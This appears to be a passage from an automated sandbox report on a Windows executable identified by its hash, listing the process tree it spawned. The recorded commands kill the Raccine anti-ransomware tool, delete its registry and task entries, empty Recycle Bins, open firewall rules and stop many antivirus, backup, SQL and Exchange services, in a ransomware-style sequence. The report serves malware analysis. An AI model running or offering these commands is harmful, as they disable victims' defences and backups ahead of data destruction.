of 3400 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe sc.exe PID 572 wrote to memory of 3400 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe sc.exe PID 572 wrote to memory of 3400 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe sc.exe PID 572 wrote to memory of 216 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe net.exe PID 572 wrote to memory of 216 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe net.exe PID 572 wrote to memory of 216 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe net.exe PID 572 wrote to memory of 5024 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe sc.exe PID 572 wrote to memory of 5024 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe sc.exe PID 572 wrote to memory of 5024 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe sc.exe PID 572 wrote to memory of 3412 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe sc.exe PID 572 wrote to memory of 3412 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe sc.exe PID 572 wrote to memory of 3412 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe sc.exe PID 572 wrote to memory of 2112 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe Conhost.exe PID 572 wrote to memory of 2112 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe Conhost.exe PID 572 wrote to memory of 2112 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe Conhost.exe PID 572 wrote to memory of 4404 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe sc.exe PID 572 wrote to memory of 4404 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe sc.exe PID 572 wrote to memory of 4404 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe sc.exe PID 572 wrote to memory of 2728 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe net.exe PID 572 wrote to memory of 2728 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe net.exe PID 572 wrote to memory of 2728 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe net.exe PID 572 wrote to memory of 2312 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe Conhost.exe PID 572 wrote to memory of 2312 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe Conhost.exe PID 572 wrote to memory of 2312 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe Conhost.exe PID 572 wrote to memory of 5036 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe net.exe PID 572 wrote to memory of 5036 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe net.exe PID 572 wrote to memory of 5036 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe net.exe PID 572 wrote to memory of 3032 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe net.exe PID 572 wrote to memory of 3032 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe net.exe PID 572 wrote to memory of 3032 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe net.exe PID 572 wrote to memory of 4184 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe net.exe PID 572 wrote to memory of 4184 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe net.exe PID 572 wrote to memory of 4184 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe net.exe PID 572 wrote to memory of 1300 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe net.exe PID 572 wrote to memory of 1300 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe net.exe PID 572 wrote to memory of 1300 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe net.exe PID 572 wrote to memory of 4048 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe net.exe PID 572 wrote to memory of 4048 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe net.exe PID 572 wrote to memory of 4048 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe net.exe PID 572 wrote to memory of 1936 572 6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe"C:\Users\Admin\AppData\Local\Temp\6555038a04997404d48cf866ebb81f134082ef1613408779cf2a589068312a42.exe"1⤵
- Checks computer location settings
- Drops startup file
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:572 -
C:\Windows\SysWOW64\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1748
-
-
C:\Windows\SysWOW64\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵PID:4636
-
-
C:\Windows\SysWOW64\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
PID:1176
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵PID:4936
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵PID:2740
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin2⤵PID:4756
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:312
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:232
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config Dnscache start= auto2⤵
- Launches sc.exe
PID:3400
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SSDPSRV start= auto2⤵
- Launches sc.exe
PID:216
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config upnphost start= auto2⤵
- Launches sc.exe
PID:5024
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
- Launches sc.exe
PID:3412
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
- Launches sc.exe
PID:2112
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
- Launches sc.exe
PID:4404
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config FDResPub start= auto2⤵
- Launches sc.exe
PID:2728
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
- Launches sc.exe
PID:2312
-
-
C:\Windows\SysWOW64\net.exe"net.exe" start Dnscache /y2⤵PID:5036
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start Dnscache /y3⤵PID:9064
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" start FDResPub /y2⤵PID:3032
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start FDResPub /y3⤵PID:9348
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" start SSDPSRV /y2⤵PID:4184
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start SSDPSRV /y3⤵PID:9868
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" start upnphost /y2⤵PID:1300
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start upnphost /y3⤵PID:11764
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop avpsus /y2⤵PID:4048
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵PID:10896
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵PID:1936
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵PID:12556
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfewc /y2⤵PID:3144
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵PID:9832
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BMR Boot Service /y2⤵PID:4364
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵PID:12456
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵PID:2804
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵PID:11324
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop DefWatch /y2⤵PID:2748
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DefWatch /y3⤵PID:9824
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccEvtMgr /y2⤵PID:2308
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y3⤵PID:10928
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccSetMgr /y2⤵PID:3228
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵PID:10912
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SavRoam /y2⤵PID:3108
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SavRoam /y3⤵PID:12012
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop RTVscan /y2⤵PID:4136
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵PID:12124
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBFCService /y2⤵PID:3996
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵PID:11340
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBIDPService /y2⤵PID:404
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBIDPService /y3⤵PID:9860
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵PID:740
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y3⤵PID:12100
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBCFMonitorService /y2⤵PID:1952
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y3⤵PID:12168
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooBackup /y2⤵PID:2864
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵PID:12108
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooIT /y2⤵PID:4360
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooIT /y3⤵PID:12636
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop zhudongfangyu /y2⤵PID:628
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y3⤵PID:11748
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop stc_raw_agent /y2⤵PID:1980
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y3⤵PID:12504
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VSNAPVSS /y2⤵PID:4884
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y3⤵PID:11920
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamTransportSvc /y2⤵PID:1228
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵PID:11780
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploymentService /y2⤵PID:876
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵PID:8688
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:3644
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵PID:12612
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop veeam /y2⤵PID:2096
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop veeam /y3⤵PID:13184
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop PDVFSService /y2⤵PID:3968
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵PID:11516
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:3980
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵PID:11756
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:1452
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵PID:13572
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵PID:1100
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y3⤵PID:12676
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:2120
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵PID:12536
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:1944
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵PID:8744
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecRPCService /y2⤵PID:2080
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵PID:13176
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:3788
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵PID:13532
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcronisAgent /y2⤵PID:716
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵PID:12708
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵PID:3220
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y3⤵PID:12668
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵PID:736
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y3⤵PID:9852
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sophos /y2⤵PID:4420
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sophos /y3⤵PID:11740
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Acronis VSS Provider” /y2⤵PID:1668
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Acronis VSS Provider” /y3⤵PID:12484
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MsDtsServer /y2⤵PID:3188
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MsDtsServer /y3⤵PID:14772
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop IISAdmin /y2⤵PID:1364
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop IISAdmin /y3⤵PID:12408
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeES /y2⤵PID:5044
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeES /y3⤵PID:13936
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Agent” /y2⤵PID:2968
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Agent” /y3⤵PID:12512
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EraserSvc11710 /y2⤵PID:2376
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EraserSvc11710 /y3⤵PID:13272
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Enterprise Client Service” /y2⤵PID:4680
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Enterprise Client Service” /y3⤵PID:11908
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “SQL Backups /y2⤵PID:1628
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “SQL Backups /y3⤵PID:12716
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MsDtsServer100 /y2⤵PID:4836
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MsDtsServer100 /y3⤵PID:13540
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop NetMsmqActivator /y2⤵PID:4068
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NetMsmqActivator /y3⤵PID:13588
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeIS /y2⤵PID:3012
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeIS /y3⤵PID:12620
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos AutoUpdate Service” /y2⤵PID:4536
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y3⤵PID:12148
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SamSs /y2⤵PID:4312
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SamSs /y3⤵PID:13284
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer /y2⤵PID:3912
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer /y3⤵PID:13192
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “SQLsafe Backup Service” /y2⤵PID:1924
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “SQLsafe Backup Service” /y3⤵PID:12700
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MsDtsServer110 /y2⤵PID:2092
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MsDtsServer110 /y3⤵PID:12644
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop POP3Svc /y2⤵PID:4608
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop POP3Svc /y3⤵PID:13132
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeMGMT /y2⤵PID:3536
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMGMT /y3⤵PID:13516
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SMTPSvc /y2⤵PID:1992
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SMTPSvc /y3⤵PID:12572
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵PID:2084
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y3⤵PID:12156
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “SQLsafe Filter Service” /y2⤵PID:3620
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “SQLsafe Filter Service” /y3⤵PID:12184
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop msftesql$PROD /y2⤵PID:2104
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msftesql$PROD /y3⤵PID:12580
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SstpSvc /y2⤵PID:2352
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SstpSvc /y3⤵PID:11996
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeMTA /y2⤵PID:4116
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMTA /y3⤵PID:11936
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Device Control Service” /y2⤵PID:3684
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Device Control Service” /y3⤵PID:12176
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$SYSTEM_BGC /y2⤵PID:2724
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y3⤵PID:12652
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Symantec System Recovery” /y2⤵PID:5040
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Symantec System Recovery” /y3⤵PID:11500
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$SQL_2008 /y2⤵PID:4808
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y3⤵PID:12660
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop UI0Detect /y2⤵PID:4388
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop UI0Detect /y3⤵PID:13168
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeSA /y2⤵PID:2232
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeSA /y3⤵PID:11772
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos File Scanner Service” /y2⤵PID:1048
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos File Scanner Service” /y3⤵PID:12472
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$TPS /y2⤵PID:1784
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$TPS /y3⤵PID:13200
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Veeam Backup Catalog Data Service” /y2⤵PID:3632
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y3⤵PID:13208
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$SYSTEM_BGC /y2⤵PID:4244
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y3⤵PID:11784
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop W3Svc /y2⤵PID:776
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop W3Svc /y3⤵PID:11692
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeSRS /y2⤵PID:4120
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeSRS /y3⤵PID:13628
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Health Service” /y2⤵PID:4912
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Health Service” /y3⤵PID:11348
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$TPSAMA /y2⤵PID:1920
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$TPSAMA /y3⤵PID:13688
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Zoolz 2 Service” /y2⤵PID:4236
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Zoolz 2 Service” /y3⤵PID:13264
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$TPS /y2⤵PID:4212
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPS /y3⤵PID:12528
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “aphidmonitorservice” /y2⤵PID:3420
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “aphidmonitorservice” /y3⤵PID:9184
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop msexchangeadtopology /y2⤵PID:1512
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msexchangeadtopology /y3⤵PID:12192
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos MCS Agent” /y2⤵PID:2116
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Agent” /y3⤵PID:13248
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:1564
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵PID:12548
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$TPSAMA /y2⤵PID:4952
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPSAMA /y3⤵PID:13128
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “intel(r) proset monitoring service” /y2⤵PID:2832
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y3⤵PID:12724
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop msexchangeimap4 /y2⤵PID:4584
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msexchangeimap4 /y3⤵PID:13596
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos MCS Client” /y2⤵PID:4412
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Client” /y3⤵PID:13524
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ARSM /y2⤵PID:4960
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ARSM /y3⤵PID:11332
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$BKUPEXEC /y2⤵PID:4248
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y3⤵PID:12216
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop unistoresvc_1af40a /y2⤵PID:4904
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop unistoresvc_1af40a /y3⤵PID:12416
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Message Router” /y2⤵PID:1064
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Message Router” /y3⤵PID:11680
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:4468
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵PID:13292
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$ECWDB2 /y2⤵PID:2500
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$ECWDB2 /y3⤵PID:12208
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop audioendpointbuilder /y2⤵PID:4460
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop audioendpointbuilder /y3⤵PID:14128
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Safestore Service” /y2⤵PID:4448
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Safestore Service” /y3⤵PID:12480
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:4504
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵PID:12116
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PRACTICEMGT /y2⤵PID:4444
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y3⤵PID:13976
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos System Protection Service” /y2⤵PID:840
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos System Protection Service” /y3⤵PID:12008
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecDeviceMediaService /y2⤵PID:2824
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecDeviceMediaService /y3⤵PID:13216
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PRACTTICEBGC /y2⤵PID:4976
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y3⤵PID:13548
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Web Control Service” /y2⤵PID:3564
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Web Control Service” /y3⤵PID:13224
-
-
-
